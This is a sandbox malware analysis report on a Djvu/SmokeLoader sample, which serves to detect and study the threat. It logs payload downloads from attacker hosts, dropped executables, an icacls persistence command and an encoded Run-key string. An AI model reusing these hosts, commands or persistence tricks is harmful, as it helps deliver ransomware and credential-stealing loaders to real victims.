Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: uaery.top
Source: global traffic	HTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
Source: global traffic	HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 80.85.241.98
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: uaery.top
Source: global traffic	HTTP traffic detected: GET /totti.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.106.124.133
Source: global traffic	HTTP traffic detected: GET /totti.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.106.124.133
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: uaery.top

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.74.80

Source: llpb1133.exe, 00000020.00000003.666449360.0000000000631000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000020.00000003.666449360.0000000000631000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com^ equals www.facebook.com (Facebook)

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1128.exe C:\Users\user\AppData\Local\Temp\1128.exe
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rirdbih C:\Users\user\AppData\Roaming\rirdbih
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\vcredist_5f4680.dll",Options_RunDLL 0600cc00-00e0-0478-0ea3-ae35d8b7780b
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EAD.exe C:\Users\user\AppData\Local\Temp\8EAD.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F207.exe C:\Users\user\AppData\Local\Temp\F207.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DE4C.exe C:\Users\user\AppData\Local\Temp\DE4C.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\42FE.exe C:\Users\user\AppData\Local\Temp\42FE.exe
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Process created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\352F.exe C:\Users\user\AppData\Local\Temp\352F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9760.exe C:\Users\user\AppData\Local\Temp\9760.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\849F.exe C:\Users\user\AppData\Local\Temp\849F.exe
Source: C:\Users\user\AppData\Local\Temp\DE4C.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 520
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3960 -ip 3960
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe
Source: C:\Users\user\AppData\Local\Temp\9760.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 520
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	Process created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	Process created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe
Source: C:\Users\user\AppData\Local\Temp\42FE.exe	Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
Source: C:\Users\user\AppData\Local\Temp\352F.exe	Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe --Task
Source: C:\Users\user\AppData\Local\Temp\42FE.exe	Process created: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe "C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe"
Source: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1128.exe C:\Users\user\AppData\Local\Temp\1128.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EAD.exe C:\Users\user\AppData\Local\Temp\8EAD.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F207.exe C:\Users\user\AppData\Local\Temp\F207.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DE4C.exe C:\Users\user\AppData\Local\Temp\DE4C.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\42FE.exe C:\Users\user\AppData\Local\Temp\42FE.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\352F.exe C:\Users\user\AppData\Local\Temp\352F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9760.exe C:\Users\user\AppData\Local\Temp\9760.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\849F.exe C:\Users\user\AppData\Local\Temp\849F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9760.exe C:\Users\user\AppData\Local\Temp\9760.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3960 -ip 3960	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\vcredist_5f4680.dll",Options_RunDLL 0600cc00-00e0-0478-0ea3-ae35d8b7780b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Process created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EAD.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\42FE.exe	Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
Source: C:\Users\user\AppData\Local\Temp\42FE.exe	Process created: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe "C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe"
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\352F.exe	Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	Process created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	Process created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe
Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe	Process created: unknown unknown

Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Djvu

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
file.exe

Source: C:\Users\user\AppData\Local\Temp\42FE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352F.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: 42FE.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
Source: 352F.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
